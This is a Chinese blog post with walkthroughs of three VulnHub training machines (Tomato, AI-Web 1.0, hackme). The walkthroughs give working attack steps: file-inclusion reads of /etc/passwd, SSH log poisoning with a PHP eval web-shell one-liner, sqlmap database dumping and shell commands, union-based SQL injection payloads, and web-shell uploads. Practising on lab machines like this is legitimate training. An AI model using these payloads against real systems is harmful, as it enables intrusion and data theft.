tomato/A1web 1.0/hackme/靶机复现漏洞详解

最新推荐文章于 2024-09-14 14:58:05 发布
最新推荐文章于 2024-09-14 14:58:05 发布
阅读量797 收藏 14
点赞数 18
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jz031212/article/details/140935488
版权

[tomato]靶机复现漏洞详解!

靶机地址:

https://download.vulnhub.com/tomato/Tomato.ova

 

靶机环境:Vmware

网络:NAT模式

信息收集:

arp-scan -l    扫描靶机ip地址

扫描开放的端口信息        nmap -sS -sV -p- 192.168.77.135

发现开放端口21,80,2211,8888.

既然开放了web端口,那看看它有什么

 dirb http://192.168.77.135     扫描目录

 访问发现存在目录遍历。

 查看infoPHP文件的源码,文件包含的代码“include”

 漏洞利用:

读取一下etc/password,读取成功,存在文件包含漏洞。

 之前扫描出来 2211 远程连接端口,尝试连接,然后访问日志/var/log/auth.log,发现无论是否连接成功,日志中都会出现用户名及其操作

将一句话木马作为用户名使用 ssh 连接靶机 ip

注:这里 kali 出问题,用户名内不能有特殊字符,随便切换一个 linux 主机连接即可

ssh '<?php eval($_POST[cmd]); ?>'@192.168.77.135 -p 2211

写入成功.

 使用蚁剑连接日志地址试试

连接成功 得到信息

------------------

【A1web 1.0】靶机复现详解!

靶机地址:
https://www.vulnhub.com/entry/ai-web-1,353/
 
攻击机:kali
            首先虚拟机建一个A1web 1.0靶机            切换nat模式 然后kali扫描

            nmap -sV ip段 0/24                                   扫描出ip进行访问

       访问没有什么信息

                   使用dirb 对网页进一步扫描

    扫描出来地址进行访问

                     尝试发现robots.txt中有内容 

 访问发现/m3diNf0/不能正常访问 

          发现/se3reTdir777/uploads/也不能访问页面

 使用dirb 对/m3diNf0和/se3reTdir777扫描 

 发现一个网址访问发现是phpinfo页面 

                        继续扫/se3reTdir777 

     访问index.php 

                   发现是查询页面 考虑sql注入          输入’报错发现sql注入漏洞

   通过抓包得到注入点uid=1&Operation=Submit

                   使用sqlmap注入页面为http://192.168.77.134/se3reTdir777/index.php

                   注入点为uid=1&Operation=Submit--dbs 列出数据库

sqlmap -u  "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -dbs

得到了aiweb1      information_schema 两个数据库     -D 指定数据库 aiweb1     --tables 列出表名

sqlmap -u  "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 --tables

 得到 user systemUser 两个表名  再通过-T 指定表名user   --columns 列出字段

sqlmap -u  "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns 

it" -D aiweb1 -T user --columns

得到 firstName id lastName 3个字段   再-C 指定字段 id     --dump 获取字段中的数据

sqlmap -u  "http://192.168.77.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C id --dump

 获取shell:

sqlmap -u "http://192.168.77.134/se3reTdir777/" --data "uid=1&Operation=Submit"  --

 

   选2自定义路径 连接成功

                        上传一句话木马

<?php @eval($_POST['cmd'])?>

上传成功

                访问使用蚁剑连接 

 连接成功并添加得到信息

------------------------------

[hackme]靶机复现漏洞详解!!

靶场介绍:

靶机下载地址:

hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/

 

  首先虚拟机建一个hackme靶机   切换nat模式   然后kali扫描自己全端口

              nmap -sV ip段 0/24            扫描出ip进行访问

 发现是个登录页面可以注册先注册然后登录 

 发现是搜索框,我们直接用搜索型的sql注入

 判断用什么注入

                经过实验 得出 我们可以使用 booktitle下的名字加’ and 1=1#

                也就是说 使用 CISSP Guide' and 1=1#

 CISSP Guide' and 1=2#

使用union联合注入 查看数据库名字

       CISSP Guide' union select 1,2,database() #

 

 得出数据库名,查看数据库下的表名,可以通过group_concat()函数拼接显示所有表名:

CISSP Guide' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='webapphacking' #

  查看users表下的字段 

CISSP Guide' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' #

 获取字段下的数据

CISSP Guide' union select user,name,pasword from users #

 

  经过尝试为 superadmin           2386acb2cf356944177746fc92523983 SGD

                       确定为这个账号               将密码md5解密

                        解密出密码为 Uncrackable 然后去登录 

    解密出密码为 Uncrackable 然后去登录 

发现可以上传图片            我们就可以尝试一下上传木马

已上传至uploads文件夹里 访问一下 

                     访问成功,使用蚁剑连接一下 

 添加获得查看信息 

姜季䍩
关注
Telegram anti-revoke plugin - Telegram 防撤回插件-C/C++开发
05-26
Telegram防撤销插件-Telegram防撤销回插件Telegram-Anti-Revoke:globe_showing_Americas: Tele简体中文电报本地消息反吊销...当前支持自动识别:英文,简体中文,繁体中文,日文,韩文:tomato:兼容性当前仅与Win兼容
UVa1348/LA3310 Tomato Automata
06-14
《UVa1348/LA3310 Tomato Automata——解题指南与实践》 在编程竞赛的世界中,UVa(University of Virginia)在线判题系统是广大学者和爱好者的重要学习平台,其中的题目UVa1348/LA3310 "Tomato Automata" 是一道...
[tomato]靶机复现漏洞详解
muyuchen110的博客
07-29 576
【代码】[tomato]靶机复现漏洞详解
Tomato靶机复现过程
weixin_67729650的博客
08-04 1074
这里我们看到了有一个用户Tomato的uid为1000(我们linux主机创建的第一个用户的uid为1000),且它的shell为/bin/bash(说明可以分配终端),再结合我们前面扫到的2211远程连接端口,说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址,就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了,那不就拿下了?紧接着我们可以试试我们学过的文件包含的漏洞知识,去试试。
TOMATO靶机漏洞复现
2301_81881972的博客
09-04 882
将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。这个很阁僚...一开始有中间有下边还有,不过我问了一下说有就行了。发现多了一些报错信息,大概率写入木马成功.弱口令不行,xxs也不行,xxe还是不行。我们来使用kali来操作...什么也弄不了只有一番茄图片。
文件包含漏洞Tomato靶机渗透_详解
m0_59151303的博客
07-29 579
var/log/auth.log 记录了所有和用户认证相关的日志。前面扫描出来的2211、25还有其他几个不常的见的端口不知道是干什么的,所以使用kali命令扫描nmap -A 192.168.204.141 -p-使用kali的dirb进行目录扫描:dirb http://192.168.204.141/用御剑扫描工具扫描虚拟机的NAT网段,发现靶机的IP是192.168.204.141。然后在网页端查看ubuntu报错信息:/var/log/auth.log。点开发现是一个PHP的探针文件。
hackme,aiwebtomato靶机解析大礼包
l_OMl_l的博客
07-29 591
5.之前扫描出来 2211 远程连接端口,尝试连接,然后访问日志/var/log/auth.log,发现无论是否连接成功,日志中都会出现用户名及其操作。3.发现无目录,则可能是端口不同,使用 nmap 扫描,发现有 8888 和 2211 端口,同时使用 dirb 扫描目录。4.依次查看,发现第一个目录返回403,扫描目录,获取绝对路径,第二个目录不可用,但去掉upload可用。5.输入不同id,数据变化,存在注入,提交抓包,并在提交框参数后加 *2.进入页面,发现没有可用数据,扫描目录。
Vulnhub靶机TOMATO_ 1
LainWith的博客
08-29 1125
系列Tomato(此系列共1台)发布日期:2020年09月14日注释:使用vmwar workstation运行虚拟机难度:低目标:取得 root 权限 + Flag主机发现端口扫描信息收集路径爬取文件包含写入日志内核漏洞枚举本地提权。...
【每日打靶练习】Vulnhub靶机平台-tomato
leo788的博客
12-30 1515
在网页的下边找到包含内容,通过返回信息中的用户属性得到信息:root用户可以执行shell,下方的tomato用户也可以执行shell,继续。尝试ssh连接,这里使用错误的用户名和错误的密码,输入三次后,写入日志中,检查一下log,成功获取到日志信息,可通过修改ruser来进行注入。刷新日志进行查看,发现注入未显示,证明注入成功,木马被作为代码执行,若显示则失败,代码木马作为文本执行。包含失败,这里未开放远程包含,同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞,选择可能性高的来试一下。
Vulnhub靶机tomato渗透
xingjinhao123的博客
02-26 1272
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/tomato-1,557/ 该靶机目标是获取root目录下的flag,难度是中等到困难 运行环境: 靶机:网络连接方式设为自动桥接,IP地址:192.168.1.86 攻击机:通网段下的kali linux,IP地址:192.168.1.44 开始渗透 运行靶机 获取IP地址 扫描端口及其服务 扫描目录 开始访问 80端口首页是一张图片,源代码也没有获取有用的信息 server-status是一个目录 antibo
Vulnhub-Tomato靶机实战
御七彩虹猫
05-06 1013
Vulnhub-Tomato靶机实战
电子时钟.rar_嵌入式/单片机/硬件编程_C51__嵌入式/单片机/硬件编程_C51_
08-09
定时器产生1s的中断,中断中变量自增。...在LCD1602上第一行显示字符(tomato todo)。在LCD1602上第二行显示时间(小时:分钟:秒)。设置两个按键可以控制电子时钟的启动(TR0=1)和停止(TR0=0)
matlab代码笑脸-tomato_matlab:Matlab/Octave中的TOMATO(https://github.com/MRKon
05-27
Octave中运行TOMATO() 地位 系统 Mac和Linux构建(Travis) Windows版本(Appveyor) 去做 cmake脚本下载数据 局限性 不适用于八度音阶。 因此,在代码内无法进行任何Yaml修改。 在OSX和Linux下,已部署的mex已...
小米路由器R1D刷写tomato固件教程
04-28
小米路由器R1D刷写tomato固件教程 准备工作。 1、小米路由器R1D,把标准版的系统升级成开发版,这步很简单,到官网下载,在升级页面更新就可以了; http://www1.miwifi.com/miwifi_download.html 2、放弃质保(反正...
基于高通主板的ARM架构服务器
D404234的博客
09-11 1430
但高通在服务器市场面临激烈竞争,联发科在手机芯片市场挑战高通,苹果加快自研芯片使用步伐给高通压力,服务器市场英特尔占主导,高通要成功需克服诸多困难。高通在服务器芯片领域面临挑战,有收购与专利问题,博通收购后高通削减“非核心业务”支出,Intel 市占率高且 Arm 生态和软件不完善,高通在 Arm 服务器芯片市场进展不大,2018 年高通服务器芯片部门裁员约 280 名,占部门总人数一半左右,业务前景充满不确定性。易获取部署,众多供应商,90%主流软件适配,兼容性强,常见系统和程序可顺畅运行。
通过TensorBoard查看服务器训练过程
记录图像处理中遇到的点点滴滴
09-12 211
在本地查看服务器训练代码过程
怎么选择适合的服务器
最新发布
2403_86998484的博客
09-14 485
大家都知道,不管是公司还是个人,在数字化浪潮已经席卷全球的环境下,大家对服务器的需求是日渐增长的。很多人在买服务器的时候,多少都有点选择困难,今天我们就来对比下物理服务器和弹性云服务器,看看选哪个更省心。业务规模:如果你的业务还在起步阶段,或者只是想自己倒腾点东西,比如建steam游戏的服务器、建个人博客、论坛等,那么云服务器应该更适合你。想象一下,物理服务器就像你家的老式冰箱,虽然样子有点过时,但性能稳定,用起来心里踏实。而弹性云服务器,就像是你的智能手机,随时随地,想怎么用就怎么用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值